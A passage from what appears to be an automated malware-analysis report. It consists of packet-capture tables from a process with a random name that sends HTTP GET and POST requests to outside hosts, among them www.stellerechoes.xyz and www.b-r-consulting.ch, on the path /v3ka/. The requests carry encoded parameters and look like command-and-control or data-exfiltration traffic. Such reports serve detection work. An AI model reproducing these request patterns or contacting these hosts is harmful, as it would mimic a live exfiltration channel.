67 32 67 4c 65 4e 39 49 73 4b 54 51 68 50 32 31 49 6a 2b 62 48 51 5a 6e 34 35 36 44 43 6a 68 74 76 57 32 5a 75 47 73 70 4d 4d 38 44 57 47 50 56 32 4c 4d 4f 70 4a 65 43 56 63 33 6d 4d 39 4c 4c 64 77 36 62 61 48 35 49 31 31 4d 35 59 66 56 49 4b 51 77 4c 65 32 76 6b 56 43 4b 78 48 6f 4e 64 4e 37 2f 77 39 4c 4c 53 66 59 63 4d 31 71 6d 55 4e 53 58 32 4d 4a 4b 41 55 71 33 39 38 71 50 4f 79 6b 74 77 7a 51 72 54 4e 61 4a 4c 45 47 6d 72 59 56 44 69 66 4e 50 38 43 68 4c 5a 35 6e 62 4c 6e 6d 58 50 31 6a 76 41 41 73 59 75 46 6c 55 69 6d 48 38 34 78 6d 4a 37 72 32 4d 30 4e 48 73 4b 4e 72 6c 44 57 35 49 4f 50 77 4c 32 49 2b 6d 33 6f 6d 34 72 7a 31 6e 55 49 75 46 4e 57 51 68 62 43 34 78 56 35 6d 4b 68 56 49 76 53 33 73 70 37 7a 66 32 76 51 58 45 71 56 2f 55 4e 74 63 34 46 44 35 67 44 6e 58 33 4e 2f 53 34 6a 5a 54 50 72 73 73 6f 4f 61 6f 58 74 63 58 75 6c 46 51 76 79 70 41 46 44 42 4f 76 33 73 75 43 56 31 47 78 32 70 49 31 63 62 74 4d 56 35 79 4c 49 6a 67 7a 44 4e 71 53 69 6c 57 62 37 6c 6a 69 73 44 4d 61 45 39 74 33 4f 34 70 58 6e 43 68 65 75 52 43 4f 4e 65 45 72 33 32 36 49 62 79 52 7a 75 6f 45 4e 6d 68 74 43 58 34 57 45 47 72 4d 4c 54 78 39 61 77 4f 2b 65 4f 79 42 66 50 67 68 57 32 41 6c 47 35 35 38 7a 75 39 67 35 42 7a 78 53 55 7a 47 63 52 4f 34 63 61 63 55 70 4c 4c 63 47 50 63 30 6d 76 77 4b 65 31 39 7a 41 41 31 57 5a 33 66 74 41 6d 4c 74 63 53 4f 76 5a 51 2b 46 6c 6d 6c 64 34 57 6a 65 7a 59 50 76 4b 31 4d 34 78 4b 4a 37 30 55 46 4e 79 66 6a 58 50 6f 61 49 78 42 2f 39 2b 6f 59 4e 46 76 4b 45 66 77 57 66 4a 71 5a 7a 6e 4f 73 6f 38 66 71 47 36 74 65 65 72 38 54 66 6e 74 72 76 68 72 35 6b 39 34 34 70 33 42 38 4d 35 42 71 4e 51 61 79 34 4b 61 65 6e 71 68 4c 42 55 48 4d 4a 6a 5a 2f 35 45 70 52 78 30 2b 74 66 59 73 68 52 76 52 6c 6f 37 36 48 66 44 38 57 36 79 45 41 78 7a 4e 77 4a 34 6c 37 41 75 61 4f 4c 57 42 6e 4f 46 34 68 33 5a 53 2b 48 75 34 56 71 53 73 6b 65 76 2b 6d 55 2f 46 78 36 7a 75 45 6f 69 73 4d 72 41 6e 58 67 66 43 33 62 79 68 6a 59 57 79 65 62 68 36 70 44 6f 53 4a 2f 78 65 65 4b 5a 6f 52 31 48 6b 48 41 55 39 37 33 32 46 37 77 6f 37 50 65 69 59 42 46 70 5a 50 76 4f 49 6a 49 2b 70 56 6d 5a 47 42 69 6b 65 65 32 5a 4c 6f 53 34 59 41 2b 61 48 4f 44 45 6e 31 74 78 72 49 64 49 73 51 73 4a 66 70 43 46 51 6f 6c 76 49 45 52 48 5a 59 36 5a 33 4d 6a 39 67 59 6b 74 35 6e 2b 66 54 36 49 72 62 58 4e 43 59 6e 42 68 69 75 75 79 65 4b 2b 55 6e 67 42 45 50 76 43 72 68 63 77 52 2b 68 6f 39 69 51 5a 35 4d 61 76 41 75 72 50 6c 6c 44 58 64 6a 32 4c 51 46 6c 44 78 59 68 47 6f 50 62 68 37 31 2f 45 35 42 59 70 74 4c 66 35 59 34 34 30 64 6c 36 64 61 45 62 54 73 73 41 65 65 46 52 73 50 65 66 4c 70 50 4f 35 70 46 39 70 67 4c 38 46 54 4d 6e 53 7a 51 72 51 64 56 2f 65 51 76 32 79 35 5a 4b 68 4d 59 5a 4e 70 44 2f 77 59 38 6e 4d 73 2f 51 38 76 58 73 4e 36 2b 57 56 67 46 6e 78 68 51 6d 48 4a 58 6d 50 4a 62 54 75 64 68 4f 46 51 48 6a 69 46 73 45 4d 56 49 42 61 59 56 4f 74 65 6a 4b 72 78 75 4d 6a 6b 32 41 5a 50 4d 70 67 30 33 6f 75 78 31 51 63 71 38 66 68 48 6b 6c 39 4e 50 6b 39 64 74 42 52 64 74 43 4a 71 6a 68 47 48 35 46 75 44 50 41 36 6c 33 67 38 6f 64 48 45 4e 30 38 32 71 71 2f 35 53 74 6f 34 72 70 7a 72 45 61 73 76 66 4d 41 33 76 36 30 43 37 4a 55 61 54 77 69 67 4e 70 4c 4c 5a 71 77 62 58 59 4f 46 64 4d 4d 6b 30 49 6c 4b 75 41 76 45 6d 30 7a 2f 4d 2b 6f 37 30 7a 30 66 63 51 51 47 76 49 48 77 42 2f 70 31 62 6a 4c 49 55 79 50 6c 56 31 36 58 66 69 44 6f Data Ascii: nf8dPP8p=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
Feb 28, 2024 15:45:44.261287928 CET	9002	OUT	Data Raw: 77 72 35 36 34 74 72 50 78 37 34 49 44 65 2b 57 55 33 74 35 76 46 6a 65 59 4d 36 75 4e 56 67 62 32 4f 6e 44 45 42 53 2f 53 61 4a 54 4a 74 36 4f 49 2f 75 61 49 30 75 6c 71 44 71 48 32 2b 70 31 36 6f 75 59 71 46 55 66 67 63 4b 4c 68 36 6b 4c 54 75 Data Ascii: wr564trPx74IDe+WU3t5vFjeYM6uNVgb2OnDEBS/SaJTJt6OI/uaI0ulqDqH2+p16ouYqFUfgcKLh6kLTuZ3L73r/wtOWVrjRmL2DPtUDjoRJDmXkgR+ZRJY6CzCahwdN2KiE3G97gWT5YPVfCmQ1NLTBrrRFpP/ybTsc3u06lRbDeywQ09/DBpzOVZ/hhRWqSUy63o/nlTMSau32EvKkQT4KrWjkbJxM86iOiQCUG/UyQnORDl
Feb 28, 2024 15:45:44.473588943 CET	6430	OUT	Data Raw: 6d 44 39 4e 6a 54 61 59 48 35 51 59 57 55 4f 34 45 6d 2b 78 55 6b 39 4e 57 49 4a 56 35 32 44 71 33 66 71 6f 53 58 5a 70 45 6b 71 64 6c 6f 34 62 36 48 7a 65 42 61 6d 78 4f 65 4c 70 66 65 63 38 79 74 39 32 6b 77 41 43 36 78 6a 6e 38 4d 2b 7a 44 7a Data Ascii: mD9NjTaYH5QYWUO4Em+xUk9NWIJV52Dq3fqoSXZpEkqdlo4b6HzeBamxOeLpfec8yt92kwAC6xjn8M+zDzt4lFpkh4KPaaC0Qgwc2JvJsrTOI3hYm476QOqE4qOVZyVKkUIKMLn72ugDnkyVOTLOVptWnzTR1dWfBFfp2LB0rtjYxZ3gEC95L4eaEtYkNNC+YkT2eDW3dqIUln8LnZW6lkfaBMo96ZxnFQs20J4rBSF1a3vhtaD
Feb 28, 2024 15:45:44.473705053 CET	3858	OUT	Data Raw: 51 32 62 32 51 33 56 58 32 45 70 70 63 74 55 4d 4c 4f 61 74 46 54 39 2f 6b 74 69 7a 4f 58 46 65 56 6e 65 6c 42 45 42 62 56 61 6c 4f 7a 50 6a 44 62 45 6a 54 2f 33 44 6e 34 73 77 4f 6e 6e 41 78 4e 4e 61 4b 41 79 39 43 4a 2f 53 46 39 74 53 6f 32 38 Data Ascii: Q2b2Q3VX2EppctUMLOatFT9/ktizOXFeVnelBEBbValOzPjDbEjT/3Dn4swOnnAxNNaKAy9CJ/SF9tSo28MJEXbHIj7n1aGtWqWAS0Xaca5IstU2/bjPvz7OcBX8tOphJj0lpvUAOst2GBRjUv7XcX0m3H9BLYGOL7SuMPMVyI4K6biYDZZudsXdwV46NFHaOVg72pbqi4iZCwgACfHXAJSCdO4VDVuDxnzVdz26xa+dFYchvwa
Feb 28, 2024 15:45:44.474070072 CET	2572	OUT	Data Raw: 4a 64 4e 43 63 45 44 30 39 48 30 6d 35 42 71 74 49 56 4d 58 63 4e 76 53 50 74 6c 43 41 64 33 46 64 48 43 48 35 35 51 6c 39 33 4b 6b 54 34 33 49 47 78 36 4d 2f 75 6c 31 55 4f 49 4c 43 76 59 78 73 4c 30 41 61 43 70 69 6a 42 53 2f 31 69 7a 62 56 41 Data Ascii: JdNCcED09H0m5BqtIVMXcNvSPtlCAd3FdHCH55Ql93KkT43IGx6M/ul1UOILCvYxsL0AaCpijBS/1izbVAO+a68bf3fYQwH6yMs17FXa6ezR/YsG/63coXG9tCfggsVqj2iJccqMtwukP/KIazj1197OU+T+RtNzLiiwJ1KpogG/kdnAoI4J7RqnpgQOcC6YfGhdXmYFQj3ijV3ATue8Kex6ncurlhbBUAVWHvzT/vHAGtrV2y0
Feb 28, 2024 15:45:44.474244118 CET	5144	OUT	Data Raw: 4c 76 2f 33 65 5a 67 45 4d 75 70 63 42 79 50 66 32 5a 51 37 44 63 69 57 34 4a 46 55 71 74 65 5a 41 69 39 54 4c 37 67 54 59 55 64 75 59 75 67 49 4b 4d 4e 75 46 38 47 32 56 6d 6c 2b 72 6a 77 33 4c 70 72 66 6d 68 4a 7a 44 36 36 37 32 45 47 4a 75 50 Data Ascii: Lv/3eZgEMupcByPf2ZQ7DciW4JFUqteZAi9TL7gTYUduYugIKMNuF8G2Vml+rjw3LprfmhJzD6672EGJuP378wR5xObZY9x8xr0OOFgovLmjTscrnYz7fgs4Z7WtHSL7S8GAMNuBYiy7BIUNZCgm/uo0Xv9wB0OSSfW4MYoTBa4B9VJ2qGhImXkyMjlPVzk4gWxnezg+kXjpsN0Fky0pijVj1Wv+QHQrBZJ1scV6dto1xM/NQ4n
Feb 28, 2024 15:45:44.474586010 CET	7716	OUT	Data Raw: 6b 64 71 48 37 56 7a 6a 52 72 6d 73 63 4d 78 31 34 44 78 48 78 57 68 70 44 42 65 49 52 67 36 78 57 33 52 4b 47 76 33 6d 70 6a 32 73 54 67 70 4e 46 49 6e 34 51 65 54 74 36 46 4c 4d 39 6b 2f 53 55 6f 42 69 4a 52 62 64 45 72 4c 65 69 6c 42 4e 64 63 Data Ascii: kdqH7VzjRrmscMx14DxHxWhpDBeIRg6xW3RKGv3mpj2sTgpNFIn4QeTt6FLM9k/SUoBiJRbdErLeilBNdc+nDPplHhPAvGwgJAe2mtXY5G4JYm6UNNKCm5EfIZ3C0A3j0igdsO2EYkAABGgIVzo4HTwb3efemK9fE7tWwZS7QSDkXR3zxAgif44/hJVaS6u858SfTapD7IK9KNTjCh/qs4e4DqY5XuXkT1p2wiIOJ8aJuY1U5j+
Feb 28, 2024 15:45:44.691307068 CET	2572	OUT	Data Raw: 61 4c 38 6b 30 2b 76 4f 58 67 76 73 64 77 4f 32 54 43 31 47 33 53 39 41 34 46 4b 71 49 79 4a 6a 6f 6e 5a 4f 43 70 71 45 48 44 39 6e 74 67 48 33 67 71 65 33 4e 4c 6e 53 52 75 57 34 6e 33 58 4d 30 6a 31 43 45 56 48 4b 71 72 67 72 54 46 31 4d 6c 66 Data Ascii: aL8k0+vOXgvsdwO2TC1G3S9A4FKqIyJjonZOCpqEHD9ntgH3gqe3NLnSRuW4n3XM0j1CEVHKqrgrTF1MlfJuYydyjCD0on39THFV056atgPjtyXvilKlYMBY41f0qWknhTV8riYvXOQH91cjs7NMaZ4+JN2cvk5lV7fDf7aqtSz7/5iUKFzVm+jmiIemQminyXQW9nkFgHY1OqKDh3pKbt0xBdwTpty4F0JjRakopRdTYVF2KkJ
Feb 28, 2024 15:45:44.691495895 CET	10288	OUT	Data Raw: 4b 58 47 71 55 32 6a 79 61 7a 58 64 2b 53 59 44 51 75 6a 50 33 59 56 6c 43 73 72 43 35 46 64 66 62 39 45 35 59 6d 59 4f 39 66 71 79 44 76 36 4c 4c 57 72 76 4f 6d 51 2b 56 64 5a 64 65 79 2b 4e 35 50 53 53 6c 46 2b 68 4e 79 41 39 6a 74 66 48 33 39 Data Ascii: KXGqU2jyazXd+SYDQujP3YVlCsrC5Fdfb9E5YmYO9fqyDv6LLWrvOmQ+VdZdey+N5PSSlF+hNyA9jtfH39IEHcVBYEkvSjBxOLJttUYpm7DBtc48VcViq5qRG2rtM13djr8rbJWpdI1AjjADq2jodGAQMz3thSKWau9fUsX6MxQ11DfdJ89KX2+rjf2DS+dcjtsq9YRcIy2HnxXiSaAkENZ/bZDoifVOtBlso6wD2Jlh663efba
Feb 28, 2024 15:45:44.691812992 CET	2029	OUT	Data Raw: 74 76 65 37 70 4e 79 69 70 59 4f 35 77 64 36 4f 71 58 51 6e 52 6a 61 2f 77 31 58 39 54 36 4b 6b 46 70 4b 46 56 31 67 33 66 65 48 66 6c 54 4a 4d 74 31 33 4c 56 2b 6d 79 52 73 6d 4a 44 37 75 53 4f 39 44 2b 73 6c 59 4f 2f 4e 64 64 4b 32 36 66 4d 45 Data Ascii: tve7pNyipYO5wd6OqXQnRja/w1X9T6KkFpKFV1g3feHflTJMt13LV+myRsmJD7uSO9D+slYO/NddK26fME3GeKMj89/l9wx5aJrrPdja+kSyc8CO6FI7+7tGBQJZb13W5pbcOn5U8HkTMgx2eZ9BDe/aa+LJxYJGusq0aPS5OixQYqSU/TYUMLdFYQ7zZvaBKi+x1wk0pq1I0hRC+vLKYQL3i5PM3r9AEygMe1b61mHAVzlkGsC
Feb 28, 2024 15:45:45.032732964 CET	169	IN	HTTP/1.0 500 Internal Server Error Date: Wed, 28 Feb 2024 14:45:44 GMT Server: Apache Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.11.20	50243	198.177.123.106	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:45:46.996645927 CET	466	OUT	GET /v3ka/?nf8dPP8p=GFfLE978cTjgJhl1mwUYbE5kXfR5gz6iCpjaC2ljIm715WZCCh3yMSG+VpY2eWrvhd9eQ+mGyZHjkiS2WPxVQ0dW/wG4u7YMAwOv3lctYW3c8py2i2Lm0Nk=&L0=2tHtHNWXtBDdYR HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Host: www.stellerechoes.xyz Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Feb 28, 2024 15:45:47.284981966 CET	548	IN	HTTP/1.1 404 Not Found Date: Wed, 28 Feb 2024 14:45:47 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.11.20	50244	194.191.24.38	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:46:06.307988882 CET	739	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.b-r-consulting.ch Origin: http://www.b-r-consulting.ch Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: max-age=0 Referer: http://www.b-r-consulting.ch/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 57 5a 37 70 76 55 48 4f 35 6d 57 51 4c 4d 6c 39 79 65 67 44 4d 38 56 79 4d 6c 39 4e 73 73 4a 55 6a 30 73 79 6d 49 61 62 72 33 44 79 59 74 4d 33 6d 34 78 76 50 4d 32 6e 58 6c 65 36 34 6b 74 46 54 62 6e 75 47 41 78 75 53 78 51 35 4f 4d 4a 71 73 58 6d 6d 73 32 72 59 64 68 69 69 6e 36 78 36 55 41 43 78 72 2b 33 4f 48 57 46 32 6e 74 35 65 31 49 58 6e 38 6f 4a 58 74 6e 2f 57 61 54 37 4d 72 4e 7a 50 31 53 7a 38 65 63 34 4d 65 66 79 43 4f 39 33 32 68 39 57 35 75 64 53 2b 34 4f 79 34 2b 76 39 53 38 53 4f 44 52 36 36 79 30 6e 44 54 30 33 52 51 30 51 4a 55 32 62 64 70 6f 74 66 32 37 41 3d 3d Data Ascii: nf8dPP8p=WZ7pvUHO5mWQLMl9yegDM8VyMl9NssJUj0symIabr3DyYtM3m4xvPM2nXle64ktFTbnuGAxuSxQ5OMJqsXmms2rYdhiin6x6UACxr+3OHWF2nt5e1IXn8oJXtn/WaT7MrNzP1Sz8ec4MefyCO932h9W5udS+4Oy4+v9S8SODR66y0nDT03RQ0QJU2bdpotf27A==
Feb 28, 2024 15:46:06.630017042 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 28 Feb 2024 14:46:06 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: br Data Raw: 39 36 0d 0a a1 50 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 ec 66 03 1b e0 70 18 4f e7 36 76 56 61 06 41 4b c4 87 48 9a 89 51 76 a9 05 c2 05 69 a5 87 9e 01 a1 c6 e9 59 a5 4d 87 32 44 f5 ce 51 0c 4d 5b 71 e4 c1 fc 5c 2f b2 5c 84 f0 1a 81 11 10 df 3f c8 30 3f 58 8b 4d cc 19 57 d1 3f 71 df 58 b9 af dd 58 99 10 1f 72 99 eb 10 57 e3 f3 04 55 cb 8f fe f1 67 4f e3 df bf 71 bb 7f b0 bd e2 e5 0b b6 0c 4a a4 1f 23 00 6e 22 4d 8a 09 0d 0a 30 0d 0a 0d 0a Data Ascii: 96P [(slytEa$fpO6vVaAKHQviYM2DQM[q\/\?0?XMW?qXXrWUgOqJ#n"M0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.11.20	50245	194.191.24.38	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:46:09.173430920 CET	1079	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.b-r-consulting.ch Origin: http://www.b-r-consulting.ch Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 545 Cache-Control: max-age=0 Referer: http://www.b-r-consulting.ch/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 57 5a 37 70 76 55 48 4f 35 6d 57 51 4b 73 35 39 77 39 59 44 45 38 56 31 41 46 39 4e 69 4d 4a 75 6a 30 77 79 6d 4b 32 4c 72 46 33 79 5a 49 77 33 6e 35 78 76 4d 4d 32 6e 46 46 65 7a 33 45 74 53 54 62 6a 63 47 45 31 75 53 78 45 35 50 35 56 71 71 6e 6d 6c 6b 57 72 66 63 68 69 5a 78 4b 78 77 55 41 4f 62 72 38 4c 4f 48 69 31 32 67 72 74 65 6a 4a 58 6d 71 34 49 65 36 58 2f 56 51 7a 37 34 72 4e 33 70 31 51 6a 47 64 71 77 4d 48 37 4f 43 50 39 33 78 70 4e 57 45 78 74 53 71 34 65 50 32 77 65 5a 56 36 46 71 38 61 37 75 30 2b 77 76 53 71 6b 6c 77 71 46 52 55 2f 70 38 4d 6b 4d 36 4b 6e 79 6e 6b 4d 30 6d 35 76 53 73 72 57 55 50 72 49 34 50 6f 45 61 6b 50 32 7a 52 45 74 52 64 4d 33 50 31 52 4f 47 62 44 65 6e 61 78 73 59 52 32 51 77 4b 43 4f 53 61 74 43 66 6a 41 4d 30 67 72 71 71 6c 30 55 54 79 6a 63 58 41 57 77 53 36 6a 32 2f 34 30 59 70 69 54 6c 4d 46 31 6c 4b 5a 6a 47 73 56 59 46 43 4e 37 57 32 57 44 42 2f 32 51 31 4d 79 68 54 79 73 78 50 59 48 63 6e 62 6f 6a 57 32 41 46 74 33 4d 35 73 65 2f 51 38 34 56 66 6f 57 46 64 70 48 67 53 36 61 5a 43 4e 2f 31 74 36 62 75 76 54 4d 48 2f 57 4e 58 57 34 6c 77 41 72 64 6d 61 61 6f 6e 41 4a 30 78 41 70 63 45 46 69 52 53 34 43 67 31 4d 56 49 35 30 72 33 6e 38 58 46 70 37 70 78 70 30 30 4e 57 42 77 55 75 78 2b 47 35 75 44 42 51 70 75 71 4f 4e 50 57 70 46 4e 37 39 69 53 37 6d 42 65 4e 59 68 6b 4d 41 4b 4e 33 32 45 31 58 37 57 61 72 45 68 5a 70 64 38 57 59 49 61 34 37 33 67 48 67 31 52 4d 57 42 33 6b 5a 6f 4b 55 54 31 6f 4a 6f 31 36 70 4d 56 77 43 7a 71 68 38 